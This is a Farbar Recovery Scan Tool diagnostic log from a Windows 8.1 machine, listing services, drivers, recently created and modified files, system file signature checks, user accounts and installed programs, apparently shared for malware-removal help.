
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2772720 2016-01-17] (Microsoft Corporation)

R2 DragonLoggerService; C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe [137280 2014-07-12] (Nuance Communications, Inc.)

R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)

R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)

R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [328296 2014-10-17] (Intel Corporation)

R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [703984 2014-09-22] (SEIKO EPSON CORPORATION)

S3 Olympus DVR Service; C:\Program Files (x86)\Common Files\Olympus Shared\DeviceManager\olydvrsv.exe [174592 2012-11-08] (OLYMPUS IMAGING CORP.) [File not signed]

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [293080 2015-08-04] (Realtek Semiconductor)

S2 SpxDictService; C:\Program Files (x86)\Spellex\Spellex Dictation\SpxDictService.exe [17920 2015-02-12] () [File not signed]

R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-04-11] (Synaptics Incorporated)

R2 TheDesktopWeatherService; C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe [152008 2015-11-02] ()

R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [41472 2014-01-01] (Validity Sensors, Inc.) [File not signed]

R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-10-07] (Microsoft Corporation)

R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-10-07] (Microsoft Corporation)

 

===================== Drivers (Whitelisted) ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)

R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [126976 2014-09-03] (Intel Corporation)

S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [508120 2014-08-15] (Realsil Semiconductor Corporation)

R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3556056 2014-10-28] (Realtek Semiconductor Corporation                           )

R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-04-11] (Synaptics Incorporated)

S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-10-07] (Microsoft Corporation)

R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-10-07] (Microsoft Corporation)

R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-10-07] (Microsoft Corporation)

R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.)

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-02-09 14:28 - 2016-02-09 14:28 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller

2016-02-09 11:48 - 2016-02-09 14:34 - 00000000 ____D C:\FRST

2016-01-31 19:25 - 2016-02-05 13:33 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk

2016-01-28 20:46 - 2016-01-28 20:46 - 00000000 ____D C:\Program Files\Common Files\DESIGNER

2016-01-22 18:57 - 2016-01-22 18:57 - 00000000 ____D C:\ProgramData\Unchecky

2016-01-22 18:56 - 2016-01-22 18:56 - 00003996 _____ C:\Windows\System32\Tasks\LaunchPreSignup

2016-01-22 18:55 - 2016-02-09 11:34 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\WeatherTool

2016-01-22 18:55 - 2016-01-22 18:55 - 00023164 _____ C:\Windows\System32\Tasks\{087E0D47-040C-780F-0511-0B09797E117A}

2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-6827-0

2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-3ee5-1

2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\Program Files (x86)\WeatherTool

2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sonocent Audio Notetaker

2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\Program Files (x86)\Sonocent

2016-01-12 22:03 - 2015-12-10 00:40 - 00033456 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe

2016-01-12 22:03 - 2015-11-17 21:07 - 01380864 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00705024 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00505344 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll

2016-01-12 20:54 - 2015-12-11 04:38 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2016-01-12 20:54 - 2015-12-11 04:00 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2016-01-12 20:54 - 2015-12-11 03:55 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2016-01-12 20:54 - 2015-12-11 03:50 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2016-01-12 20:54 - 2015-12-11 03:45 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll

2016-01-12 20:54 - 2015-12-11 03:21 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2016-01-12 20:54 - 2015-12-11 03:18 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2016-01-12 20:54 - 2015-12-11 03:09 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll

2016-01-12 20:54 - 2015-12-11 03:09 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll

2016-01-12 20:54 - 2015-12-11 03:03 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2016-01-12 20:54 - 2015-12-11 02:59 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2016-01-12 20:54 - 2015-12-11 02:43 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2016-01-12 20:54 - 2015-12-11 02:43 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll

2016-01-12 20:54 - 2015-12-11 02:38 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2016-01-12 20:54 - 2015-12-11 02:37 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2016-01-12 20:54 - 2015-12-11 02:35 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2016-01-12 20:54 - 2015-12-11 02:26 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2016-01-12 20:54 - 2015-12-11 02:14 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2016-01-12 20:54 - 2015-12-11 02:12 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2016-01-12 20:54 - 2015-12-11 02:08 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2016-01-12 20:54 - 2015-12-11 02:07 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2016-01-12 20:53 - 2015-12-30 19:32 - 07453016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe

2016-01-12 20:53 - 2015-12-30 19:32 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll

2016-01-12 20:53 - 2015-12-30 19:32 - 01499912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll

2016-01-12 20:53 - 2015-12-07 10:56 - 01380600 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 02745184 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02528784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02450240 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02447136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02334104 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 02324744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01877504 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01798480 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01484888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01288128 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01210200 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 01150232 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 01115640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01037680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00914672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00850680 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00735496 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00700360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00629600 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00584656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00557856 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00498472 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00492736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00463776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00399776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00299080 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00275312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00274280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00250520 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00248432 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00246856 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00244296 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00229272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00203016 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00184912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00183856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00116720 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00110544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00099136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00090904 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00090392 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00081032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00076936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll

2016-01-12 20:53 - 2015-12-04 15:00 - 01097216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll

2016-01-12 20:53 - 2015-12-03 19:42 - 00561952 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys

2016-01-12 20:53 - 2015-12-03 19:42 - 00397224 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll

2016-01-12 20:53 - 2015-12-03 19:42 - 00137968 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll

2016-01-12 20:53 - 2015-12-03 19:42 - 00106960 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll

2016-01-12 20:53 - 2015-12-03 19:41 - 00177488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys

2016-01-12 20:53 - 2015-12-03 18:52 - 00340872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll

2016-01-12 20:53 - 2015-12-03 18:52 - 00120376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll

2016-01-12 20:53 - 2015-12-03 18:52 - 00091416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll

2016-01-12 20:53 - 2015-12-03 18:28 - 00401920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys

2016-01-12 20:53 - 2015-12-03 18:28 - 00202240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys

2016-01-12 20:53 - 2015-12-03 18:07 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

2016-01-12 20:53 - 2015-12-03 18:07 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax

2016-01-12 20:53 - 2015-12-03 18:05 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL

2016-01-12 20:53 - 2015-12-03 18:02 - 01664000 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL

2016-01-12 20:53 - 2015-12-03 18:00 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL

2016-01-12 20:53 - 2015-12-03 17:58 - 00378880 ____C (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll

2016-01-12 20:53 - 2015-12-03 17:51 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll

2016-01-12 20:53 - 2015-12-03 17:36 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll

2016-01-12 20:53 - 2015-12-03 17:30 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL

2016-01-12 20:53 - 2015-12-03 17:28 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

2016-01-12 20:53 - 2015-12-03 17:28 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax

2016-01-12 20:53 - 2015-12-03 17:27 - 00736256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL

2016-01-12 20:53 - 2015-12-03 17:24 - 01411584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL

2016-01-12 20:53 - 2015-12-03 17:23 - 00402432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL

2016-01-12 20:53 - 2015-12-03 17:16 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll

2016-01-12 20:53 - 2015-12-03 17:13 - 01441280 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll

2016-01-12 20:53 - 2015-12-03 17:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll

2016-01-12 20:53 - 2015-12-03 17:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll

2016-01-12 20:53 - 2015-12-03 17:01 - 00743936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL

2016-01-12 20:53 - 2015-12-03 16:45 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll

2016-01-12 20:53 - 2015-12-03 16:40 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL

2016-01-12 20:53 - 2015-12-03 16:29 - 00887296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL

2016-01-12 20:53 - 2015-12-02 15:04 - 00670208 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll

2016-01-12 20:53 - 2015-12-02 15:01 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll

2016-01-12 20:52 - 2015-12-08 19:08 - 00685432 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll

2016-01-12 20:52 - 2015-12-08 19:07 - 00507176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-02-09 14:34 - 2015-12-08 09:24 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1343854479-873069186-2863876452-1002

2016-02-09 14:32 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Packages

2016-02-09 14:31 - 2015-10-07 13:32 - 00000924 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2016-02-09 13:39 - 2015-12-14 13:39 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1}.job

2016-02-09 13:38 - 2015-12-14 13:38 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65}.job

2016-02-09 10:04 - 2015-12-08 10:21 - 00000000 ____D C:\ProgramData\TEMP

2016-02-09 10:00 - 2015-12-08 11:54 - 00003950 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{D813D5A7-8FB5-485D-B469-BE69E474CFFF}

2016-02-09 09:57 - 2015-12-14 14:01 - 00000000 __RDO C:\Users\Molly Poole\OneDrive

2016-02-09 09:57 - 2015-10-07 13:32 - 00000920 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2016-02-07 23:56 - 2013-08-22 13:36 - 00000000 ____D C:\Windows\Inf

2016-02-07 22:55 - 2013-08-22 14:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2016-02-07 22:54 - 2013-08-22 13:25 - 00524288 ___SH C:\Windows\system32\config\BBI

2016-02-07 20:32 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\AppReadiness

2016-02-05 13:37 - 2015-12-08 10:47 - 00003108 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1343854479-873069186-2863876452-1002

2016-02-05 13:33 - 2015-10-07 13:32 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2016-02-05 13:27 - 2015-12-08 11:20 - 00000000 ____D C:\ProgramData\Claro Software

2016-02-04 13:39 - 2015-10-07 11:34 - 00000000 ____D C:\ProgramData\Hewlett-Packard

2016-02-02 04:26 - 2015-10-07 13:32 - 00003896 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2016-02-02 04:26 - 2015-10-07 13:32 - 00003660 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2016-02-01 15:04 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Claro Software

2016-02-01 15:04 - 2015-12-08 11:20 - 00000000 ____D C:\Program Files (x86)\Claro Software

2016-02-01 15:03 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\regid.2004-06.com.clarosoftware

2016-02-01 13:14 - 2015-12-08 09:18 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Google

2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared

2016-01-28 20:45 - 2015-12-08 10:30 - 00000000 ____D C:\Program Files\Microsoft Office

2016-01-24 23:10 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole

2016-01-24 20:00 - 2013-08-22 15:36 - 00000000 ___HD C:\Program Files\WindowsApps

2016-01-22 21:29 - 2015-12-14 21:42 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Adobe

2016-01-22 18:10 - 2015-12-08 10:17 - 00000000 ____D C:\ProgramData\Nuance

2016-01-22 14:12 - 2015-12-08 10:24 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Apple Computer

2016-01-22 14:12 - 2014-11-22 01:00 - 00992588 _____ C:\Windows\system32\PerfStringBackup.INI

2016-01-19 13:41 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\rescache

2016-01-19 12:50 - 2015-12-08 10:30 - 00002457 _____ C:\Users\Public\Desktop\Sonocent Audio Notetaker.lnk

2016-01-19 12:00 - 2015-12-08 11:55 - 00001235 _____ C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT

2016-01-18 22:07 - 2015-10-07 13:33 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2016-01-18 22:06 - 2015-10-07 13:33 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files\Microsoft Silverlight

2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight

2016-01-13 21:40 - 2015-10-07 13:08 - 00000000 ____D C:\Windows\system32\appraiser

2016-01-13 21:40 - 2014-11-22 05:15 - 00000000 ___SD C:\Windows\system32\CompatTel

2016-01-13 18:21 - 2013-08-22 15:20 - 00000000 ____D C:\Windows\CbsTemp

2016-01-13 18:20 - 2015-10-07 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight

2016-01-13 18:17 - 2015-10-07 13:00 - 00000000 ____D C:\Windows\system32\MRT

2016-01-13 18:14 - 2015-10-07 13:00 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

 

==================== Files in the root of some directories =======

 

2015-12-08 11:55 - 2016-01-19 12:00 - 0001235 _____ () C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT

 

==================== Bamital & volsnap =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2016-02-05 17:12

 

==================== End of FRST.txt =========================

[moles926]

Additional scan result of Farbar Recovery Scan Tool (x64) Version:07-02-2016

Ran by Molly Poole (2016-02-09 14:34:59)

Running from D:\Users\Molly Poole\Desktop

Windows 8.1 Pro (X64) (2015-12-08 09:17:34)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1343854479-873069186-2863876452-500 - Administrator - Disabled)

Guest (S-1-5-21-1343854479-873069186-2863876452-501 - Limited - Disabled)

Molly (S-1-5-21-1343854479-873069186-2863876452-1003 - Limited - Enabled) => C:\Users\Molly

Molly Poole (S-1-5-21-1343854479-873069186-2863876452-1002 - Administrator - Enabled) => C:\Users\Molly Poole

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)

Apple Application Support (32-bit) (HKLM-x32\...\{C5815ACF-FD34-4553-8A22-C7411B7E662B}) (Version: 4.1.1 - Apple Inc.)

Apple Application Support (64-bit) (HKLM\...\{CBF12D2F-CF64-4CB7-858B-2C1F21068E5F}) (Version: 4.1.1 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9840 - Broadcom Corporation)

Claro AudioNote (HKLM-x32\...\{69EA9C44-A9B7-4C55-9146-575FFABF856E}) (Version: 1.1.12 - Claro Software)

Claro Voice Setup (HKLM-x32\...\{F2E70DB4-344B-44BC-8840-DD5BA4B9CE13}) (Version: 1.1.2 - Claro Software)

ClaroCapture (HKLM-x32\...\{8B7C91A0-A204-4800-9925-C4D27D1F7F61}) (Version: 3.0.31 - Claro Software)

ClaroIdeas (HKLM-x32\...\{10D5763B-475D-4E7C-B7A0-7E19CDB535A3}) (Version: 2.1.4 - Claro Software)

ClaroRead Pro (HKLM-x32\...\{3674C7AF-C8F7-4672-97EB-13E72DBEC8D1}) (Version: 7.0.16 - Claro Software)

Dragon NaturallySpeaking 13 (HKLM-x32\...\{33EA20FB-5389-4938-BA59-2BCD9BB68F41}) (Version: 13.00.000 - Nuance Communications Inc.)

Easy Photo Scan (HKLM-x32\...\{1A6DED1E-A024-455D-AA82-203D6B3B0CBC}) (Version: 1.00.0006 - Seiko Epson Corporation)

Epson Connect Printer Setup (HKLM-x32\...\{D9B1D51B-EB56-410D-AEB5-1CCFAC4B6C8C}) (Version: 1.3.0 - SEIKO EPSON CORPORATION)

